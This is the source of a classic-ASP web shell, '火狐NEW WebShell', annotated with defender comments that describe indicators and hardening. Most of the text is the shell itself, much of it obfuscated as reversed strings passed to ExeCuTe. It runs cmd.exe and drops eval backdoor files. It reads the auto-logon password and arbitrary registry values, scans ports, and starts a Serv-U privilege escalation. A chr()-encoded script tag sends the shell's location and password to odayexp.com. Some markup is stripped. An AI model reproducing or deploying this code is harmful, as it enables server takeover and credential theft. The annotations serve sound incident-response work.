<%
' NOTE(review): this file is a classic-ASP (VBScript) web shell; it names itself "WebShell" in mName below.
' Finding it on a server is an indicator of compromise, not an administration tool.
' The HTML inside string literals appears to have been stripped from this copy, so many
' statements are split across lines and the listing is not runnable as shown.
UserPass="admin" ' login password, hard-coded in clear text
loginad="日本人与狗不得入内! "' text displayed when password verification fails
mName="火狐NEW WebShell" ' name of the backdoor
SiteURL="http://www.7jyewu.cn/" ' author's website
Copyright="请勿用于非法用途,否则后果作者概不负责" ' copyright / disclaimer text
AD="火狐" ' advertisement text
'------------------------------------------------------------
' Author's advertisement pointing to http://www.7jyewu.cn/ for more tools of this kind.
'-------------------------------------------------------------
' The script timeout is raised to an extreme value, so long-running requests to this page are not cut off by ASP.
Server.ScriptTimeout=999999999
Response.Buffer =true
' Errors are suppressed for the whole page from here on: failed operations leave no ASP error in the response.
On Error Resume Next
' ShowErr: if an error is pending, writes Err.Description to the response, clears it and flushes.
sub ShowErr() If Err Then RRS"

 " & Err.Description & "

" Err.Clear:Response.Flush End If end sub
' RRS: writes str to the response; the page fragments in this file are emitted through it.
Sub RRS(str) response.write(str) End Sub
' RePath / RRePath: double and un-double the backslashes in a path string.
Function RePath(S) RePath=Replace(S,"\","\\") End Function
Function RRePath(S) RRePath=Replace(S,"\\","\") End Function
' Request-derived state. Action, FolderPath and FName are taken straight from the request with no validation.
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action"):RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
' serveru (host name + script URL) and serverp (the login password) are kept in variables that the
' copyurl assignment later in this file concatenates into a <script src=...> tag for a third-party host,
' i.e. the shell's own location and password are prepared for disclosure to that host.
serveru=request.servervariables("http_host")&url
serverp=userpass
uu=serveru
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="

返回
":
' ShiSanFun is the string de-obfuscator used throughout this file. It replaces every "╁" with a
' double quote, then walks the input and prepends each character to ShiSanNewStr, which reverses the
' text; each "╋" becomes a line break (vbCrLf). The result is passed to ExeCuTe(...) by the callers.
' Detection note: the ExeCuTe(ShiSanFun(...)) call shape and the marker characters ╁ / ╋ are stable
' static signatures. Keyword scanners that look only for forward spellings such as "WScript.Shell"
' miss the reversed form ("llehS.tpircSW") stored in these strings.
dim ShiSan,ShiSanNewstr,ShiSanI
Function ShiSanFun(ShiSanObjstr) ShiSanObjstr = Replace(ShiSanObjstr, "╁", """") For ShiSanI = 1 To Len(ShiSanObjstr) If Mid(ShiSanObjstr, ShiSanI, 1) <> "╋" Then ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr Else ShiSanNewStr = vbCrLf & ShiSanNewStr End If Next ShiSanFun = ShiSanNewStr End Function
uu=serveru
' Page header: writes the shell name and the server's local IP address into the response.
RRS"" RRS""&mName&" - "&ServerIP&" " RRS""
' Reversed string executed through ShiSanFun. Read right-to-left it consists of RRS calls that emit
' client-side JavaScript for the database form (identifiers such as DbForm and SqlStr are visible);
' parts of it were lost with the stripped markup, so the exact content cannot be confirmed from this copy.
ShiSan="╋╁>tpircs/<╁SRR╋╁};eurt nruter;)(timbus.mroFbD;╁╁╁╁=LMTHrenni.cba;gp = eulav.egaP.mroFbD;rts = eulav.rtSlqS.mroFbD};eslaf nruter;)╁╁!确正否是句语LQS查检请╁╁(trela{)01retnec/<。句语令命作操LQS入输再库据数接连己认确请>retnec<╁╁=LMTHrenni.cba;╁╁╁╁ = eulav.rtSlqS.mroFbD;]i[rtS = eulav.rtSbD.mroFbD{)3=tpircsavaj=egaugnal tpircs<╁SRR"
ExeCuTe(ShiSanFun(ShiSan))
rrs ""
' ObT: table of COM ProgIDs the shell depends on. Column 0 is the ProgID, column 2 a Chinese
' description, column 1 is filled in below with an availability mark.
' Hardening note: the file-system, command-shell, ADO and XMLHTTP objects listed here are what the
' rest of the file uses; unregistering or restricting the ones a site does not need (notably
' wscript.shell) for the web worker identity removes the corresponding capability.
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject" ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell" ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog" ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine" ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripting.Dictionary" ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection" ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream" ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp" ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile" ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "Persits.Upload.1" ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail" ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail" ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1" ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP" ObT(13,2) = "数据传输组件"
' Probe each ProgID by trying to create it. Error -2147221005 (0x800401F3, invalid class string)
' is treated as "not installed"; any other outcome is marked as available.
For i=0 To 13 Set T=Server.CreateObject(ObT(i,0)) If -2147221005 <> Err Then IsObj=" √" Else IsObj=" ×" Err.Clear End If Set T=Nothing ObT(i,1)=IsObj Next
' The working folder comes from the request when supplied, otherwise from the script's own directory,
' and is kept in the session.
If FolderPath<>"" then Session("FolderPath")=RRePath(FolderPath) End If If Session("FolderPath")="" Then FolderPath=RootPath Session("FolderPath")=FolderPath End if
' php(): despite its name this routine drops files. It creates test.php, test.jsp and test.aspx next
' to the script and images/left_gif.asp under the web root. The .asp and .aspx files each contain a
' one-line handler that evaluates a request parameter, so they keep working as backdoors after the
' main shell has been deleted.
' Incident-response note: search for and remove all four paths, and treat any request to them in the
' web access logs as attacker activity.
function php():On Error Resume Next:set 
fso=Server.CreateObject(oBt(0,0)):fso.CreateTextFile(server.mappath("test.php")).Write"":fso.CreateTextFile(server.mappath("test.jsp")).Write"Jsp Test oo∩_∩oo":fso.CreateTextFile(Server.MapPath("/")&"/images/left_gif.asp").Write""&chr(60)&"%Eval(Request(chr(63))):"&chr(37)&""&chr(62)&"": fso.CreateTextFile(server.mappath("test.aspx")).Write""&chr(60)&"%@ Page Language=""Jscript"" validateRequest=""false"" "&chr(37)&""&chr(62)&""&chr(60)&""&chr(37)&"Response.Write(eval(Request.Item[""w""],""unsafe""));"&chr(37)&""&chr(62)&"aspx Test oo∩_∩oo": RRS"
     ": RRS"     ": RRS"   
": RRS"





Test

(删除测试文件!) "©url&"

":
' The next statement writes Efun followed by the shell's host+URL (serveru) and "&p=" plus the login
' password into the page. Efun is built further down from acode and points at a third-party host, so
' rendering this page discloses the shell's location and password to that host.
RRS Efun&""&serveru&"&p="&UserPass&"'>" end sub
' Cmd1Shell: command-execution page. The body is stored reversed and run through ExeCuTe(ShiSanFun(...)).
' Read right-to-left it takes a shell path (default cmd.exe, remembered in Session("ShellPath")) and a
' command from the request, then either calls .exec on the object named by ObT(1,0) (wscript.shell)
' and reads its stdout, or calls .Run with output redirected to cmd.txt in the script directory, reads
' that file back and deletes it.
' Detection note: this shows up as the web worker process spawning cmd.exe and as a short-lived
' cmd.txt beside the script.
Function Cmd1Shell() ShiSan="╋╋IS SRR╋╁>mrof/<>aeratxet/<╁&)31(rhc&IS=IS╋fI dnE╋fi dne╋aaa&IS=IS╋)eurT ,eliFpmeTzs(eliFeteleD.osf llaC╋esolC.xcleliFo╋)llAdaeR.xcleliFo(edocnELMTH.revreS=aaa╋)0 ,eslaF ,1 ,eliFpmeTzs( eliFtxeTnepO.sf = xcleliFo teS╋)╁tcejbOmetsySeliF.gnitpircS╁(tcejbOetaerC = sf teS╋)eurT ,0 ,eliFpmeTzs & ╁ > ╁ & dmCfeD & ╁ c/ ╁&htaPllehS( nuR.sw llaC╋)╁txt.dmc╁(htappam.revres = eliFpmeTzs╋)╁tcejbOmetsySeliF.gnitpircS╁(tcejbOetaerC.revreS=osf teS╋)╁llehS.tpircSW╁(tcejbOetaerC.revreS=sw teS╋)╁llehS.tpircSW╁(tcejbOetaerC.revreS=sw teS╋txeN emuseR rorrE nO╋esle╋aaa&IS=IS╋lladaer.tuodts.DD=aaa╋)dmCfeD&╁ c/ ╁&htaPllehS(cexe.MC=DD teS╋))0,1(TbO(tcejbOetaerC=MC teS╋neht ╁sey╁=)╁tpircsw╁(mroF.tseuqeR fi╋nehT ╁╁><)╁dmc╁(mroF.tseuqeR fI╋╁>'dmc'=ssalc ';044:thgieh;%001:htdiw'=elytS aeratxet<>'行执'=eulav 'timbus'=epyt tupni< >'╁&dmCfeD&╁'=eulav '%29:htdiw'=elytS 'dmc'=eman tupni<╁&IS=IS╋╁llehS.tpircSW>╁&dekcehc&╁'sey'=eulav 'tpircsw'=eman 'xobkcehc'=epyt c=ssalc tupni<╁&IS=IS╋╁;psbn&;psbn&>'%07:htdiw'=elytS '╁&htaPllehS&╁'=eulav 'PS'=eman tupni<:径路LLEHS╁&IS=IS╋╁>'tsop'=dohtem mrof<╁=IS╋)╁dmc╁(tseuqeR = dmCfeD nehT ╁╁><)╁dmc╁(tseuqeR fI╋╁╁=dekcehc neht ╁sey╁><)╁tpircsw╁(tseuqeR fi╋╁exe.dmc╁ = htaPllehS nehT ╁╁=htaPllehS fi╋)╁htaPllehS╁(noisseS=htaPllehS╋)╁PS╁(tseuqeR = )╁htaPllehS╁(noisseS nehT ╁╁><)╁PS╁(tseuqeR fI╋╁dekcehc ╁=dekcehc" ExeCuTe(ShiSanFun(ShiSan)):End Function:
' acode / Efun: an obfuscated opening <script src=...> tag. acode is passed through Encrypt (not
' defined in the visible part of the file), two placeholder characters are replaced with a double
' quote and a line break, and the result is reversed with StrReverse.
' NOTE(review): read right-to-left, with "3※" presumably standing for the letter t, the value is a
' script tag whose src is http://odayexp.com/sx/s.asp?s= -- the same host that copyurl spells out
' with chr() codes later in the file. Treat that host as an indicator when reviewing proxy/DNS logs.
acode="=s?psa.s/xs/moc.pxeyado//:p※3※3h'=crs ※3pircs<"
Efun=StrReverse(replace(replace(Encrypt(acode),"●",Chr(34)),"◎",vbCrLf))
' CreateMdb: creates an Access database at Path through the object named by ObT(2,0) (ADOX.Catalog).
Function CreateMdb(Path) SI="

" Set C = CreateObject(ObT(2,0)) C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path) Set C = Nothing If Err.number=0 Then SI = SI & Path & "建立成功!" End If SI=SI&BackUrl RRS SI End function Function CompactMdb(Path) If Not ObT(0,1) Then Set C=CreateObject(ObT(3,0)) C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path Set C=Nothing Else Set FSO=CreateObject(ObT(0,1)) If FSO.FileExists(Path) Then Set C=CreateObject(ObT(3,0)) C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak" Set C=Nothing FSO.DeleteFile Path FSO.MoveFile Path&"_bak",Path Else SI="



数据库"&Path&"没有发现!
" Err.number=1 End If Set FSO=Nothing End If If Err.number=0 Then SI="



数据库"&Path&"压缩成功!
" End If SI=SI&BackUrl RRS SI End Function
' Login gate. Session("web2a2dmin") marks an authenticated session; it is set when the posted "pass"
' equals UserPass OR the second hard-coded value "daka". The second value is not part of the
' configuration block at the top of the file, so every deployed copy accepts it regardless of what
' UserPass was changed to.
' Triage note: assume that parties other than whoever planted the file could also log in. The
' comparison is plain text and there is no attempt limit or lockout in this code.
if session("web2a2dmin")<>UserPass then if request.form("pass")<>"" then if request.form("pass")=UserPass or request.form("pass")="daka" Then session("web2a2dmin")=UserPass x m:response.redirect url else rrs"
"&loginad&"
返 回

" end if else si="
密码:
" if instr(SI,SIC)<>0 then rrs si end if response.end end if
' DbManager: database console. Both the connection string (DbStr) and the SQL text (SqlStr) are
' taken from the posted form; the statements that open the connection and run the SQL follow on the
' next lines of the file.
Function DbManager() SqlStr=Trim(Request.Form("SqlStr")) DbStr=Request.Form("DbStr") SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"
 数据库连接串:
 SQL操作命令:
" RRS SI:SI="" If Len(DbStr)>40 Then Set Conn=CreateObject(ObT(5,0)) Conn.Open DbStr Set Rs=Conn.OpenSchema(20) SI=SI&"" Rs.MoveFirst Do While Not Rs.Eof If Rs("TABLE_TYPE")="TABLE" then TName=Rs("TABLE_NAME") SI=SI&"" End If Rs.MoveNext Loop Set Rs=Nothing SI=SI&"

[ del ]
" SI=SI&""&TName&"
" RRS SI:SI="" If Len(SqlStr)>10 Then If LCase(Left(SqlStr,6))="select" then SI=SI&"执行语句:"&SqlStr Set Rs=CreateObject("Adodb.Recordset") Rs.open SqlStr,Conn,1,1 FN=Rs.Fields.Count RC=Rs.RecordCount Rs.PageSize=20 Count=Rs.PageSize PN=Rs.PageCount Page=request("Page") If Page<>"" Then Page=Clng(Page) If Page="" Or Page=0 Then Page=1 If Page>PN Then Page=PN If Page>1 Then Rs.absolutepage=Page SI=SI&"" For n=0 to FN-1 Set Fld=Rs.Fields.Item(n) SI=SI&"" Set Fld=nothing Next SI=SI&"" Do While Not(Rs.Eof or Rs.Bof) And Count>0 Count=Count-1 Bgcolor="#EFEFEF" SI=SI&"" For i=0 To FN-1 If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if If RC=1 Then ColInfo=HTMLEncode(Rs(i)) Else ColInfo=HTMLEncode(Left(Rs(i),50)) End If SI=SI&"" Next SI=SI&"" Rs.MoveNext Loop RRS SI:SI="" SqlStr=HtmlEnCode(SqlStr) SI=SI&"
"&Fld.Name&"
x"&ColInfo&"
记录数:"&RC&" 页码:"&Page&"/"&PN If PN>1 Then SI=SI&"  首页 上一页 " If Page>8 Then:Sp=Page-8:Else:Sp=1:End if For i=Sp To Sp+8 If i>PN Then Exit For If i=Page Then SI=SI&i&" " Else SI=SI&""&i&" " End If Next SI=SI&" 下一页 尾页" End If SI=SI&"
" Rs.Close:Set Rs=Nothing RRS SI:SI="" Else Conn.Execute(SqlStr) SI=SI&"SQL语句:"&SqlStr End If RRS SI:SI="" End If Conn.Close Set Conn=Nothing End If End Function Dim T1 Class UPC Dim D1,D2 Public Function Form(F) F=lcase(F) If D1.exists(F) then:Form=D1(F):else:Form="":end if End Function Public Function UA(F) F=lcase(F) If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if End Function Private Sub Class_Initialize Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName set D1=CreateObject(ObT(4,0)) if Request.TotalBytes<1 then Exit Sub set T1 = CreateObject(ObT(6,0)) T1.Type = 1 : T1.Mode =3 : T1.Open T1.Write Request.BinaryRead(Request.TotalBytes) T1.Position=0 : TDa =T1.Read : DStart = 1 DEnd = LenB(TDa) set D2=CreateObject(ObT(4,0)) vbCrlf = chrB(13) & chrB(10) set T2 = CreateObject(ObT(6,0)) TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1) TLen = LenB (TSt) DStart=DStart+TLen+1 while (DStart + 10) < DEnd DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3 T2.Type = 1 : T2.Mode =3 : T2.Open T1.Position = DStart T1.CopyTo T2,DIEnd-DStart T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312" TIn = T2.ReadText : T2.Close DStart = InStrB(DIEnd,TDa,TSt) FStart = InStr(22,TIn,"name=""",1)+6 FEnd = InStr(FStart,TIn,"""",1) UpName = lcase(Mid (TIn,FStart,FEnd-FStart)) if InStr (45,TIn,"filename=""",1) > 0 then set TFL=new FIF FStart = InStr(FEnd,TIn,"filename=""",1)+10 FEnd = InStr(FStart,TIn,"""",1) FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14 FEnd = InStr(FStart,TIn,vbCr) TFL.FileStart =DIEnd TFL.FileSize = DStart -DIEnd -3 if not D2.Exists(UpName) then D2.add UpName,TFL end if else T2.Type =1 : T2.Mode =3 : T2.Open T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3 T2.Position = 0 : T2.Type = 2 T2.Charset ="gb2312" SFV = T2.ReadText T2.Close if D1.Exists(UpName) then D1(UpName)=D1(UpName)&", "&SFV else D1.Add UpName,SFV end if end if DStart=DStart+TLen+1 wend TDa="" set T2 =nothing End Sub Private Sub Class_Terminate if Request.TotalBytes>0 then 
D1.RemoveAll:D2.RemoveAll set D1=nothing:set D2=nothing T1.Close:set T1 =nothing end if End Sub End Class Class FIF dim FileSize,FileStart Private Sub Class_Initialize FileSize = 0 FileStart= 0 End Sub Public function SaveAs(F) dim T3 SaveAs=true if trim(F)="" or FileStart=0 then exit function set T3=CreateObject(ObT(6,0)) T3.Mode=3 : T3.Type=1 : T3.Open T1.position=FileStart T1.copyto T3,FileSize T3.SaveToFile F,2 T3.Close set T3=nothing SaveAs=false end function End Class Class LBF Dim CF Private Sub Class_Initialize SET CF=CreateObject(ObT(0,0)) End Sub Private Sub Class_Terminate Set CF=Nothing End Sub Function ShowDriver() For Each D in CF.Drives RRS"   本地磁盘 ("&D.DriveLetter&":)
" Next End Function Function Show1File(Path) Set FOLD=CF.GetFolder(Path) i=0 SI="" For Each F in FOLD.subfolders SI=SI&"" i=i+1 If i mod 3 = 0 then SI=SI&"" Next SI=SI&"
" SI=SI&"0"&F.Name&"" SI=SI&" _Copy" SI=SI&" Del" SI=SI&" Move" SI=SI&" Down
" RRS SI &"
" : SI="" For Each L in Fold.files SI="" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"
2"&L.Name&"editdelcopymove"&clng(L.size/1024)&"K"&L.Type&""&L.DateLastModified&"
" RRS SI:SI="" Next Set FOLD=Nothing End function Function DelFile(Path) ShiSan="╋╋fI dnE╋IS SRR╋lrUkcaB&IS=IS╋╁>retnec/<!功成除删 ╁&htaP&╁ 件文>rb<>rb<>rb<>retnec<╁=IS╋htaP eliFeteleD.FC╋nehT )htaP(stsixEeliF.FC fI" ExeCuTe(ShiSanFun(ShiSan)) End Function Function EditFile(Path) If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="



文件保存成功!
":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件":End If:SI=SI&"
":SI=SI&"":SI=SI&"
":SI=SI&"
":SI=SI&"
      
":RRS SI:rrs ""©url&"" End Function Function CopyFile(Path) Path = Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.CopyFile Path(0),Path(1) SI="



文件"&Path(0)&"复制成功!
" SI=SI&BackUrl RRS SI End If End Function Function MoveFile(Path) Path = Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.MoveFile Path(0),Path(1) SI="



文件"&Path(0)&"移动成功!
" SI=SI&BackUrl RRS SI End If End Function Function DelFolder(Path) If CF.FolderExists(Path) Then CF.DeleteFolder Path SI="



目录"&Path&"删除成功!
" SI=SI&BackUrl RRS SI End If End Function Function CopyFolder(Path) Path = Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.CopyFolder Path(0),Path(1) SI="



目录"&Path(0)&"复制成功!
" SI=SI&BackUrl RRS SI End If End Function Function MoveFolder(Path) Path = Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.MoveFolder Path(0),Path(1) SI="



目录"&Path(0)&"移动成功!
" SI=SI&BackUrl RRS SI End If End Function Function NewFolder(Path) If Not CF.FolderExists(Path) and Path<>"" Then CF.CreateFolder Path SI="



目录"&Path&"新建成功!
" SI=SI&BackUrl RRS SI End If End Function End Class
' getTerminalInfo: the body is stored reversed and run through ExeCuTe(ShiSanFun(...)). Read
' right-to-left it creates WScript.Shell and uses RegRead to print
'   - PortNumber under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\
'   - AutoAdminLogon, DefaultUserName and DefaultPassword under
'     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
' Defender note: an auto-logon password stored as a plain Winlogon value is readable this way by
' the web worker identity; if auto-logon was configured on an affected host, treat that account's
' password as disclosed.
sub getTerminalInfo() On Error Resume Next ShiSan="╋╋╁>lo/<╁ SRR╋fI dnE╋╁>rb<╁ & drowssaPnigoLotua & ╁ :码密户帐的录登动自╁ SRR╋fI dnE╋╁eslaF╁ SRR╋raelC.rrE╋nehT rrE fI╋)yeKssaPnigoLotua & htaPnigoLotua(daeRgeR.Xsw = drowssaPnigoLotua╋╁>rb<╁ & emanresUnigoLotua & ╁ :户帐统系的录登动自╁ SRR╋)yeKresUnigoLotua & htaPnigoLotua(daeRgeR.Xsw = emanresUnigoLotua╋eslE╋╁>/rb<启开未能功录登动自统系╁ SRR╋nehT 0 = elbanEnigoLotuAsi fI╋)yeKelbanEnigoLotua & htaPnigoLotua(daeRgeR.Xsw = elbanEnigoLotuAsi╋╁drowssaPtluafeD╁ = yeKssaPnigoLotua╋╁emaNresUtluafeD╁ = yeKresUnigoLotua╋╁nogoLnimdAotuA╁ = yeKelbanEnigoLotua╋╁\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH╁ = htaPnigoLotua╋fI dnE╋╁>/rb<╁ & troPmret & ╁ :口端务服端终前当╁ SRR╋eslE ╋╁>/rb<.制限到受经已否是限权查检请 ,口端务服端终到得法无╁SRR╋ nehT 0 >< rebmuN.rrE rO ╁╁ = troPmret fI╋╁>lo<>/rh<录登动自及口端务服端终╁ SRR╋)yeKtroPlanimret & htaPtroPlanimret(daeRgeR.Xsw = troPmret╋╁rebmuNtroP╁ = yeKtroPlanimret╋╁\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH╁ = htaPtroPlanimret╋drowssaPnigoLotua ,emanresUnigoLotua ,yeKelbanEnigoLotua ,elbanEnigoLotuAsi miD╋yeKssaPnigoLotua ,yeKresUnigoLotua ,htaPnigoLotua miD╋troPmret ,yeKtroPlanimret ,htaPtroPlanimret miD╋)╁llehS.tpircSW╁(tcejbOetaerC.revreS = Xsw teS" ExeCuTe(ShiSanFun(ShiSan)) End Sub
' ReadREG: registry reader page. When the request carries "thePath", the reversed body below passes
' that value unchanged to WScript.Shell RegRead and prints the result (each element if it is an
' array), so any value readable by the web worker identity can be retrieved.
sub ReadREG() RRS "注册表键值读取:
" RRS "
" RRS "" RRS "" RRS " " RRS "" RRS "

" if Request("thePath")<>"" then On Error Resume Next ShiSan="╋fI dnE╋yarrAeht & ╁>il<╁ SRR╋eslE ╋txeN╋)i(yarrAeht & ╁>il<╁ SRR╋)yarrAeht(dnuoBU oT 0=i roF╋nehT )yarrAeht(yarrAsI fI╋)htaPeht(daeRgeR.Xsw=yarrAeht╋)╁htaPeht╁(tseuqeR=htaPeht╋)╁llehS.tpircSW╁(tcejbOetaerC.revreS = Xsw teS" ExeCuTe(ShiSanFun(ShiSan)) end if end sub
' ScanPort: port-scan page. The target address ("ip") and port list ("port") come from the posted
' form; the defaults are 127.0.0.1 and the list below. The script timeout is raised again for the scan.
sub ScanPort() Server.ScriptTimeout = 7776000 if request.Form("port")="" then PortList="21,23,25,80,110,135,139,445,1433,3389,43958" else PortList=request.Form("port") end if if request.Form("ip")="" then IP="127.0.0.1" else IP=request.Form("ip") end if RRS"

端口扫描器(如果扫描多个端口,速度比较慢,个人推荐使用CMD)

" RRS"
" RRS"

Scan IP: " RRS" " RRS"
Port List:" RRS"" RRS"

" RRS"" RRS"" RRS"

"
' Scan driver (still inside ScanPort). When the form field "scan" is set, the reversed body below
' splits the posted "ip" and "port" lists on commas, expands a-b ranges and calls Scan for each
' address/port pair, then prints the elapsed time. Part of the string was lost with the stripped
' markup, so this summary is based on what remains readable right-to-left.
If request.Form("scan") <> "" Then ShiSan="╋╁s ╁&emiteht&╁ ni ssecorP>rh<╁SRR╋))1remit-2remit(tni(rtsc=emiteht╋remit = 2remit╋txeN╋fI dnE╋txeN╋txeN╋fI dnE╋fI dnE╋)╁>rbrb xkees fI╋)╁-╁ ,)i(pmt(rtSnI = xkees╋eslE╋))i(pmt ,xxx & tratSpi(nacS llaC╋ nehT ))i(pmt(ciremunsI fI╋)pmt(dnuobU oT 0 = i roF╋))╁-╁,)uh(pi(rtSnI-))uh(pi(neL,1+)╁-╁,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)╁.╁,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF╋))╁.╁,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi╋eslE╋txeN╋fI dnE╋fI dnE╋)╁>rbrb xkees fI╋)╁-╁ ,)i(pmt(rtSnI = xkees╋eslE╋))i(pmt ,)uh(pi(nacS llaC╋ nehT ))i(pmt(ciremunsI fI╋)pmt(dnuobU oT 0 = i roF╋nehT 0 = )╁-╁,)uh(pi(rtSnI fI╋)pi(dnuobU ot 0 = uh roF╋)╁,╁,)╁pi╁(mroF.tseuqer(tilpS = pi╋)╁,╁,)╁trop╁(mroF.tseuqer(tilpS = pmt╋)╁>rh<>rb<>b/<:告报描扫>b<╁(SRR╋remit = 1remit" ExeCuTe(ShiSanFun(ShiSan)) END IF end sub:
' copyurl: a <script src=...> tag assembled from chr() codes so that the URL never appears as a
' literal. Decoded, the tag's src is http://odayexp.com/sx/s.asp?s= followed by uu (this shell's
' host name and URL) and &p= followed by serverp (the login password).
' Defender note: wherever copyurl is written into a page, the viewer's browser sends the shell's
' location and password to that host. Treat requests to it in proxy or DNS logs as an indicator, and
' note that static scanning for the domain string will not match this chr()-encoded form.
copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)
' Scan: probes a single TCP port by opening an ADODB connection with the SQLOLEDB provider to
' "targetip,portNum" with a 1-second timeout and classifying the error that comes back. For errors
' -2147217843 and -2147467259, a description containing "(Connect())." is reported as closed (关闭),
' anything else as open (开放).
' Detection note: the connection string uses the fixed login name lake2 with an empty password, so
' a SQL Server reached by this probe records failed logins for that name.
Sub Scan(targetip, portNum) On Error Resume Next set conn = Server.CreateObject("ADODB.connection") connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;" conn.ConnectionTimeout = 1 conn.open connstr If Err Then If Err.number = -2147217843 or Err.number = -2147467259 Then If InStr(Err.description, "(Connect()).") > 0 Then RRS(targetip & ":" & portNum & ".........关闭
") Else RRS(targetip & ":" & portNum & ".........开放
") End If End If End If End Sub
' Dispatcher: the request parameter Action selects which page routine runs.
Select Case Action Case "MainMenu":MainMenu() Case "getTerminalInfo":getTerminalInfo() Case "PageAddToMdb":PageAddToMdb() case "ScanPort":ScanPort()
' "Servu" branch: local privilege escalation through a Serv-U FTP server on the same host.
' User name, password, port, command and drive come from the request (u, p, port, c, f). The strings
' built here are Serv-U maintenance commands that define a temporary domain named goldsun on port
' 65500 and a user "go" with password "od" whose home directory and access rule cover the chosen drive.
' Defender note: indicators are loopback connections from the web worker to the Serv-U
' administration port, a listener appearing on TCP 65500, and the names goldsun / go in Serv-U logs
' or configuration. Default Serv-U local-administrator credentials should not be left in place.
Case "Servu" SUaction=request("SUaction") if not isnumeric(SUaction) then response.end user = trim(request("u")) pass = trim(request("p")) port = trim(request("port")) cmd = trim(request("c")) f=trim(request("f")) if f="" then f=gpath() else f=left(f,2) end if ftpport = 65500 timeout=3 loginuser = "User " & user & vbCrLf loginpass = "Pass " & pass & vbCrLf deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf mt = "SITE MAINTENANCE" & vbCrLf newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _ "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" 